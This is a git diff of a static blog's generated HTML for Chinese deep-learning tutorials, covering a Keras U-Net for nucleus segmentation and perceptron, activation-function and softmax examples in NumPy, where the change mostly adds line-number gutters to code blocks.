                    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

                    # Expansive path 延展路径
                    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
                    u6 = tf.keras.layers.concatenate([u6, c4])
                    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
                    c6 = tf.keras.layers.Dropout(0.2)(c6)
                    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

                    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
                    u7 = tf.keras.layers.concatenate([u7, c3])
                    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
                    c7 = tf.keras.layers.Dropout(0.2)(c7)
                    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

                    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
                    u8 = tf.keras.layers.concatenate([u8, c2])
                    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
                    c8 = tf.keras.layers.Dropout(0.1)(c8)
                    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

                    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
                    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
                    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
                    c9 = tf.keras.layers.Dropout(0.1)(c9)
                    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

                    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

                    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
                    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    20
                    21
                    22
                    23
                    24
                    25
                    26
                    27
                    28
                    29
                    30
                    31
                    32
                    33
                    34
                    35
                    36
                    37
                    38
                    39
                    40
                    41
                    42
                    43
                    44
                    45
                    46
                    47
                    48
                    49
                    50
                    51
                    52
                    53
                    54
                    55
                    56
                    57
                    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
                    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

                    # Contraction path 收缩路径
                    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
                    c1 = tf.keras.layers.Dropout(0.1)(c1)
                    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
                    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

                    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
                    c2 = tf.keras.layers.Dropout(0.1)(c2)
                    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
                    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

                    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
                    c3 = tf.keras.layers.Dropout(0.2)(c3)
                    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
                    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

                    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
                    c4 = tf.keras.layers.Dropout(0.2)(c4)
                    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
                    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

                    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
                    c5 = tf.keras.layers.Dropout(0.3)(c5)
                    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

                    # Expansive path 延展路径
                    u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
                    u6 = tf.keras.layers.concatenate([u6, c4])
                    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
                    c6 = tf.keras.layers.Dropout(0.2)(c6)
                    c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

                    u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
                    u7 = tf.keras.layers.concatenate([u7, c3])
                    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
                    c7 = tf.keras.layers.Dropout(0.2)(c7)
                    c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

                    u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
                    u8 = tf.keras.layers.concatenate([u8, c2])
                    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
                    c8 = tf.keras.layers.Dropout(0.1)(c8)
                    c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

                    u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
                    u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
                    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
                    c9 = tf.keras.layers.Dropout(0.1)(c9)
                    c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

                    outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

                    model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
                    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

                    Modelcheckpoint

                    -
                    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
                    callbacks = [
                    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
                    tf.keras.callbacks.TensorBoard(log_dir='logs')
                    ]
                    -
                    results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
                    +
                    1
                    2
                    3
                    4
                    5
                    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
                    callbacks = [
                    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
                    tf.keras.callbacks.TensorBoard(log_dir='logs')
                    ]
                    +
                    1
                    results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
                    Epoch 1/25
                     38/38 [==============================] - 20s 280ms/step - loss: 0.5785 - accuracy: 0.7459 - val_loss: 0.3360 - val_accuracy: 0.7809
                     Epoch 2/25
                    @@ -628,7 +626,7 @@ 

                    idx = random.randint(0, len(X_train))

                    preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
                    preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
                    preds_test = model.predict(X_test, verbose=1)

                    preds_train_t = (preds_train > 0.5).astype(np.uint8)
                    preds_val_t = (preds_val > 0.5).astype(np.uint8)
                    preds_test_t = (preds_test > 0.5).astype(np.uint8)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    idx = random.randint(0, len(X_train))

                    preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
                    preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
                    preds_test = model.predict(X_test, verbose=1)

                    preds_train_t = (preds_train > 0.5).astype(np.uint8)
                    preds_val_t = (preds_val > 0.5).astype(np.uint8)
                    preds_test_t = (preds_test > 0.5).astype(np.uint8)
                    19/19 [==============================] - 5s 161ms/step
                     3/3 [==============================] - 0s 91ms/step
                     3/3 [==============================] - 1s 417ms/step
                    @@ -637,7 +635,7 @@ 

                    ix = random.randint(0, len(preds_train_t))
                    imshow(X_train[ix])
                    plt.show()
                    imshow(np.squeeze(Y_train[ix]))
                    plt.show()
                    imshow(np.squeeze(preds_train_t[ix]))
                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    ix = random.randint(0, len(preds_train_t))
                    imshow(X_train[ix])
                    plt.show()
                    imshow(np.squeeze(Y_train[ix]))
                    plt.show()
                    imshow(np.squeeze(preds_train_t[ix]))
                    plt.show()

                    png

                    png

                    C:\Users\gzjzx\anaconda3\lib\site-packages\skimage\io\_plugins\matplotlib_plugin.py:150: UserWarning: Low image data range; displaying image with stretched contrast.
                    @@ -648,12 +646,12 @@ 

                    ix = random.randint(0, len(preds_val_t))
                    imshow(X_train[int(X_train.shape[0]*0.9):][ix])
                    plt.show()
                    imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
                    plt.show()
                    imshow(np.squeeze(preds_val_t[ix]))
                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    ix = random.randint(0, len(preds_val_t))
                    imshow(X_train[int(X_train.shape[0]*0.9):][ix])
                    plt.show()
                    imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
                    plt.show()
                    imshow(np.squeeze(preds_val_t[ix]))
                    plt.show()

                    png

                    png

                    png

                    可视化结果

                    -
                    !tensorboard --logdir=logs/ --host localhost --port 8088
                    +
                    1
                    !tensorboard --logdir=logs/ --host localhost --port 8088

                    png

                    @@ -4687,6 +4685,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-2-\346\204\237\347\237\245\346\234\272/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-2-\346\204\237\347\237\245\346\234\272/index.html" index f62c3620f5..a336494501 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-2-\346\204\237\347\237\245\346\234\272/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-2-\346\204\237\347\237\245\346\234\272/index.html" @@ -44,8 +44,6 @@ - - @@ -420,8 +418,8 @@

                    2.3 感知机的实现

                    2.3.1 简单的实现

                    -
                    def AND(x1, x2):
                    """
                    模拟一个 AND 门
                    """
                    w1, w2, theta = 0.5, 0.5, 0.7 # 接受参数 w1 = 0.5, w2 = 0.5, 阈值为 0.7
                    tmp = x1 * w1 + x2 * w2
                    if tmp <= theta:
                    return 0
                    elif tmp > theta:
                    return 1
                    -
                    print(AND(0, 0))
                    print(AND(1, 0))
                    print(AND(0, 1))
                    print(AND(1, 1))
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    def AND(x1, x2):
                    """
                    模拟一个 AND 门
                    """
                    w1, w2, theta = 0.5, 0.5, 0.7 # 接受参数 w1 = 0.5, w2 = 0.5, 阈值为 0.7
                    tmp = x1 * w1 + x2 * w2
                    if tmp <= theta:
                    return 0
                    elif tmp > theta:
                    return 1
                    +
                    1
                    2
                    3
                    4
                    print(AND(0, 0))
                    print(AND(1, 0))
                    print(AND(0, 1))
                    print(AND(1, 1))
                    0
                     0
                     0
                    @@ -431,33 +429,33 @@ 

                    导入权重和偏置, 把 $\theta$ 换成 $-b$:

                    $$y=\left{\begin{matrix}0\quad (b+w_1x_1+w_2x_2\le 0)\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

                    此处,$b$ 称为偏置,$w_1$ 和 $w_2$ 称为权重。感知机会计算输入信号和权重的乘积,然后加上偏置,如果这个值大于 0 则输出 1,否则输出 0。

                    -
                    import numpy as np

                    x = np.array([0, 1]) # 输入
                    w = np.array([0.5, 0.5]) # 权重
                    b = -0.7 # 偏置
                    w * x
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    import numpy as np

                    x = np.array([0, 1]) # 输入
                    w = np.array([0.5, 0.5]) # 权重
                    b = -0.7 # 偏置
                    w * x
                    array([0. , 0.5])
                     
                    -
                    np.sum(w * x)
                    +
                    1
                    np.sum(w * x)
                    0.5
                     
                    -
                    np.sum(w * x) + b  # 大约为-0.2(由浮点小数造成的运算误差)
                    +
                    1
                    np.sum(w * x) + b  # 大约为-0.2(由浮点小数造成的运算误差)
                    -0.19999999999999996
                     

                    2.3.3 使用权重和偏置的实现

                    -
                    def AND(x1, x2):
                    x = np.array([x1, x2])
                    w = np.array([0.5, 0.5])
                    b = -0.7
                    tmp = np.sum(w * x) + b
                    if tmp <= 0:
                    return 0
                    else:
                    return 1
                    -
                    print(AND(0, 0))
                    print(AND(1, 0))
                    print(AND(0, 1))
                    print(AND(1, 1))
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    def AND(x1, x2):
                    x = np.array([x1, x2])
                    w = np.array([0.5, 0.5])
                    b = -0.7
                    tmp = np.sum(w * x) + b
                    if tmp <= 0:
                    return 0
                    else:
                    return 1
                    +
                    1
                    2
                    3
                    4
                    print(AND(0, 0))
                    print(AND(1, 0))
                    print(AND(0, 1))
                    print(AND(1, 1))
                    0
                     0
                     0
                     1
                     

                    偏置的值决定了神经元被激活的容易程度。这里我们将 $w_1$ 和 $w_2$ 称为权重,将 $b$ 称为偏置,但是根据上下文,有时也会将 $b$、$w_1$、$w_2$ 这些参数统称为权重(将 1 也视为输入,$b$ 是调整神经元被激活的容易程度(输出信号为 1 的程度)的参数)。

                    -
                    def NAND(x1, x2):
                    """
                    模拟一个非门
                    """
                    x = np.array([x1, x2])
                    w = np.array([-0.5, -0.5]) # 仅权重和偏置与 AND 不同!
                    b = 0.7
                    tmp = np.sum(w * x) + b
                    if tmp <= 0:
                    return 0
                    else:
                    return 1
                    -
                    print(NAND(0, 0))
                    print(NAND(1, 0))
                    print(NAND(0, 1))
                    print(NAND(1, 1))
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    def NAND(x1, x2):
                    """
                    模拟一个非门
                    """
                    x = np.array([x1, x2])
                    w = np.array([-0.5, -0.5]) # 仅权重和偏置与 AND 不同!
                    b = 0.7
                    tmp = np.sum(w * x) + b
                    if tmp <= 0:
                    return 0
                    else:
                    return 1
                    +
                    1
                    2
                    3
                    4
                    print(NAND(0, 0))
                    print(NAND(1, 0))
                    print(NAND(0, 1))
                    print(NAND(1, 1))
                    1
                     1
                     1
                     0
                     
                    -
                    def OR(x1, x2):
                    """
                    模拟一个或门
                    """
                    x = np.array([x1, x2])
                    w = np.array([0.5, 0.5]) # 仅权重和偏置与 AND 不同!
                    b = -0.2
                    tmp = np.sum(w * x) + b
                    if tmp <= 0:
                    return 0
                    else:
                    return 1
                    -
                    print(OR(0, 0))
                    print(OR(1, 0))
                    print(OR(0, 1))
                    print(OR(1, 1))
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    def OR(x1, x2):
                    """
                    模拟一个或门
                    """
                    x = np.array([x1, x2])
                    w = np.array([0.5, 0.5]) # 仅权重和偏置与 AND 不同!
                    b = -0.2
                    tmp = np.sum(w * x) + b
                    if tmp <= 0:
                    return 0
                    else:
                    return 1
                    +
                    1
                    2
                    3
                    4
                    print(OR(0, 0))
                    print(OR(1, 0))
                    print(OR(0, 1))
                    print(OR(1, 1))
                    0
                     1
                     1
                    @@ -470,8 +468,8 @@ 

                    png

                    2.5.2 异或门的实现

                    -
                    def XOR(x1, x2):
                    """
                    使用之前定义的 AND 函数、NAND 函数、OR 函数,实现 XOR 门。
                    """
                    s1 = NAND(x1, x2)
                    s2 = OR(x1, x2)
                    y = AND(s1, s2)
                    return y
                    -
                    print(XOR(0, 0))
                    print(XOR(1, 0))
                    print(XOR(0, 1))
                    print(XOR(1, 1))
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    def XOR(x1, x2):
                    """
                    使用之前定义的 AND 函数、NAND 函数、OR 函数,实现 XOR 门。
                    """
                    s1 = NAND(x1, x2)
                    s2 = OR(x1, x2)
                    y = AND(s1, s2)
                    return y
                    +
                    1
                    2
                    3
                    4
                    print(XOR(0, 0))
                    print(XOR(1, 0))
                    print(XOR(0, 1))
                    print(XOR(1, 1))
                    0
                     1
                     1
                    @@ -4423,6 +4421,8 @@ 

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-3-\347\245\236\347\273\217\347\275\221\347\273\234/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-3-\347\245\236\347\273\217\347\275\221\347\273\234/index.html" index 875a3a60b0..35b846c614 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-3-\347\245\236\347\273\217\347\275\221\347\273\234/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-3-\347\245\236\347\273\217\347\275\221\347\273\234/index.html" @@ -44,8 +44,6 @@ - - @@ -428,24 +426,24 @@

                    神经网络中经常使用的一个激活函数:sigmoid 函数(sigmoid function)

                    $$h(x)=\frac{1}{1+\exp(-x)}$$

                    3.2.2 阶跃函数的实现

                    -
                    def step_function(x):
                    """
                    阶跃函数(允许参数取 Numpy 数组的形式)
                    """
                    y = x > 0
                    return y.astype(int)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    def step_function(x):
                    """
                    阶跃函数(允许参数取 Numpy 数组的形式)
                    """
                    y = x > 0
                    return y.astype(int)

                    对 NumPy 数组进行不等号运算后,数组的各个元素都会进行不等号运算,生成一个布尔型数组。这里,数组 x 中大于 0 的元素被转换为 True,小于等
                    于 0 的元素被转换为 False,从而生成一个新的数组 y。数组 y 是一个布尔型数组,但是我们想要的阶跃函数是会输出 int 型的 0 或 1 的函数。因此,需要把数组 y 的元素类型从布尔型转换为 int 型。

                    -
                    import numpy as np

                    x = np.array([-1.0, 1.0, 2.0])
                    y = x > 0
                    y
                    +
                    1
                    2
                    3
                    4
                    5
                    import numpy as np

                    x = np.array([-1.0, 1.0, 2.0])
                    y = x > 0
                    y
                    array([False,  True,  True])
                     
                    -
                    y = y.astype(int)
                    y
                    +
                    1
                    2
                    y = y.astype(int)
                    y
                    array([0, 1, 1])
                     

                    3.2.3 阶跃函数的图形

                    -
                    import numpy as np
                    import matplotlib.pyplot as plt


                    def strp_function(x):
                    return np.array(x > 0, dtype=int)

                    x = np.arange(-5.0, 5.0, 0.1)
                    y = step_function(x)
                    plt.plot(x, y)
                    plt.ylim(-0.1, 1.1) # 指定 y 轴的范围
                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    import numpy as np
                    import matplotlib.pyplot as plt


                    def strp_function(x):
                    return np.array(x > 0, dtype=int)

                    x = np.arange(-5.0, 5.0, 0.1)
                    y = step_function(x)
                    plt.plot(x, y)
                    plt.ylim(-0.1, 1.1) # 指定 y 轴的范围
                    plt.show()

                    png

                    3.2.4sigmoid 函数的实现

                    -
                    def sigmoid(x):
                    return 1 / (1 + np.exp(-x))
                    -
                    x = np.array([-1.0, 1.0, 2.0])
                    sigmoid(x) # 根据 NumPy 的广播功能,如果在标量和 NumPy 数组之间进行运算,则标量会和 NumPy 数组的各个元素进行运算。
                    +
                    1
                    2
                    def sigmoid(x):
                    return 1 / (1 + np.exp(-x))
                    +
                    1
                    2
                    x = np.array([-1.0, 1.0, 2.0])
                    sigmoid(x) # 根据 NumPy 的广播功能,如果在标量和 NumPy 数组之间进行运算,则标量会和 NumPy 数组的各个元素进行运算。
                    array([0.26894142, 0.73105858, 0.88079708])
                     
                    -
                    x = np.arange(-5.0, 5.0, 0.1)
                    y = sigmoid(x)
                    plt.plot(x, y)
                    plt.ylim(-0.1, 1.1)
                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    x = np.arange(-5.0, 5.0, 0.1)
                    y = sigmoid(x)
                    plt.plot(x, y)
                    plt.ylim(-0.1, 1.1)
                    plt.show()

                    png

                    3.2.6 非线性函数

                      @@ -464,8 +462,8 @@

                      3.2.7 ReLU 函数

                      在神经网络发展的历史上,sigmoid 函数很早就开始被使用了,而最近则主要使用**ReLU(Rectified Linear Unit)**函数。

                      $$h(x)=\left{\begin{matrix}x\quad(x>0)\0\quad(x\le0)\end{matrix}\right.$$

                      -
                      def relu(x):
                      return np.maximum(0, x)
                      -
                      x = np.arange(-5.0, 5.0, 0.1)
                      y = relu(x)
                      plt.plot(x, y)
                      plt.ylim(-0.1, 5)
                      plt.show()
                      +
                      1
                      2
                      def relu(x):
                      return np.maximum(0, x)
                      +
                      1
                      2
                      3
                      4
                      5
                      x = np.arange(-5.0, 5.0, 0.1)
                      y = relu(x)
                      plt.plot(x, y)
                      plt.ylim(-0.1, 5)
                      plt.show()

                      png

                      3.3 多维数组的运算

                      3.3.3 神经网络的内积

                      @@ -474,7 +472,7 @@

                      $$\mathbf{W} = \begin{pmatrix} 1 & 3 & 5\ 2 & 4 & 6 \end{pmatrix}$$

                      实现该神经网络时,要注意 $\mathbf{X}$、$\mathbf{W}$、$\mathbf{Y}$ 的形状,特别是 $\mathbf{X}$ 和 $\mathbf{W}$ 的对应
                      维度的元素个数是否一致,这一点很重要。

                      -
                      X = np.array([1, 2])
                      W = np.array([[1, 3, 5], [2, 4, 6]])
                      Y = np.dot(X, W)
                      Y
                      +
                      1
                      2
                      3
                      4
                      X = np.array([1, 2])
                      W = np.array([[1, 3, 5], [2, 4, 6]])
                      Y = np.dot(X, W)
                      Y
                      array([ 5, 11, 17])
                       

                      使用np.dot(多维数组的点积),可以一次性计算出 $\mathbf{Y}$ 的结果。
                      @@ -491,28 +489,28 @@

                      -
                      import numpy as np

                      X = np.array([1.0, 0.5])
                      W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
                      B1 = np.array([[0.1, 0.2, 0.3]])

                      print(W1.shape)
                      print(X.shape)
                      print(B1.shape)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      import numpy as np

                      X = np.array([1.0, 0.5])
                      W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
                      B1 = np.array([[0.1, 0.2, 0.3]])

                      print(W1.shape)
                      print(X.shape)
                      print(B1.shape)
                      (2, 3)
                       (2,)
                       (1, 3)
                       
                      -
                      A1 = np.dot(X, W1) + B1
                      A1
                      +
                      1
                      2
                      A1 = np.dot(X, W1) + B1
                      A1
                      array([[0.3, 0.7, 1.1]])
                       
                      -
                      Z1 = sigmoid(A1)
                      Z1
                      +
                      1
                      2
                      Z1 = sigmoid(A1)
                      Z1
                      array([[0.57444252, 0.66818777, 0.75026011]])
                       

                      实现第 1 层到第 2 层的信号传递:

                      png

                      -
                      W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
                      B2 = np.array([0.1, 0.2])

                      print(Z1.shape)
                      print(W2.shape)
                      print(B2.shape)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
                      B2 = np.array([0.1, 0.2])

                      print(Z1.shape)
                      print(W2.shape)
                      print(B2.shape)
                      (1, 3)
                       (3, 2)
                       (2,)
                       
                      -
                      A2 = np.dot(Z1, W2) + B2
                      Z2 = sigmoid(A2)
                      +
                      1
                      2
                      A2 = np.dot(Z1, W2) + B2
                      Z2 = sigmoid(A2)

                      实现第 2 层到输出层的信号传递:

                      png

                      -
                      def identity_function(x):
                      """
                      这里我们定义了 identity_function()函数(也称为“恒等函数”),并将
                      其作为输出层的激活函数。恒等函数会将输入按原样输出,因此,这个例子
                      中没有必要特意定义 identity_function()。这里这样实现只是为了和之前的
                      流程保持统一。
                      """
                      return x

                      W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
                      B3 = np.array([0.1, 0.2])

                      A3 = np.dot(Z2, W3) + B3
                      Y = identity_function(A3) # 或 Y = A3
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      def identity_function(x):
                      """
                      这里我们定义了 identity_function()函数(也称为“恒等函数”),并将
                      其作为输出层的激活函数。恒等函数会将输入按原样输出,因此,这个例子
                      中没有必要特意定义 identity_function()。这里这样实现只是为了和之前的
                      流程保持统一。
                      """
                      return x

                      W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
                      B3 = np.array([0.1, 0.2])

                      A3 = np.dot(Z2, W3) + B3
                      Y = identity_function(A3) # 或 Y = A3

                      输出层的激活函数用 $\sigma()$ 表示,不同于隐藏层的激活函数 $h()$。

                      输出层所用的激活函数,要根据求解问题的性质决定。

                        @@ -524,13 +522,13 @@

                        3.4.3 代码实现小结

                        -
                        def init_network():
                        """
                        按照神经网络的实现惯例,只把权重记为大写字母 W1,其他的(偏置或中间结果等)都用小写字母表示。
                        """
                        network = {}
                        network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
                        network['b1'] = np.array([0.1, 0.2, 0.3])
                        network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
                        network['b2'] = np.array([0.1, 0.2])
                        network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])
                        network['b3'] = np.array([0.1, 0.2])

                        return network


                        def forward(network, x):
                        """
                        表示的是从输入到输出方向的传递处理
                        """
                        W1, W2, W3 = network['W1'], network['W2'], network['W3']
                        b1, b2, b3 = network['b1'], network['b2'], network['b3']
                        a1 = np.dot(x, W1) + b1
                        z1 = sigmoid(a1)
                        a2 = np.dot(z1, W2) + b2
                        z2 = sigmoid(a2)
                        a3 = np.dot(z2, W3) + b3
                        y = identity_function(a3)
                        return y


                        network = init_network()
                        x = np.array([1.0, 0.5])
                        y = forward(network, x)
                        print(y)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        def init_network():
                        """
                        按照神经网络的实现惯例,只把权重记为大写字母 W1,其他的(偏置或中间结果等)都用小写字母表示。
                        """
                        network = {}
                        network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
                        network['b1'] = np.array([0.1, 0.2, 0.3])
                        network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
                        network['b2'] = np.array([0.1, 0.2])
                        network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])
                        network['b3'] = np.array([0.1, 0.2])

                        return network


                        def forward(network, x):
                        """
                        表示的是从输入到输出方向的传递处理
                        """
                        W1, W2, W3 = network['W1'], network['W2'], network['W3']
                        b1, b2, b3 = network['b1'], network['b2'], network['b3']
                        a1 = np.dot(x, W1) + b1
                        z1 = sigmoid(a1)
                        a2 = np.dot(z1, W2) + b2
                        z2 = sigmoid(a2)
                        a3 = np.dot(z2, W3) + b3
                        y = identity_function(a3)
                        return y


                        network = init_network()
                        x = np.array([1.0, 0.5])
                        y = forward(network, x)
                        print(y)
                        [0.31682708 0.69627909]
                         

                        3.5 输出层的设计

                        3.5.1 恒等函数和 softmax 函数

                        $$y_k=\frac{\exp(x_k)}{\sum^n_{i=1}\exp(a_i)}$$

                        -
                        def softmax(a):
                        exp_a = np.exp(a)
                        sum_exp_a = np.sum(exp_a)
                        y = exp_a / sum_exp_a

                        return y
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        def softmax(a):
                        exp_a = np.exp(a)
                        sum_exp_a = np.sum(exp_a)
                        y = exp_a / sum_exp_a

                        return y

                        3.5.2 实现 softmax 函数时的注意事项

                        由于要进行指数函数的运算,可能会导致溢出。

                        进行改进:

                        @@ -542,7 +540,7 @@

                        a = np.array([1010, 1000, 990])
                        np.exp(a) / np.sum(np.exp(a))
                        +
                        1
                        2
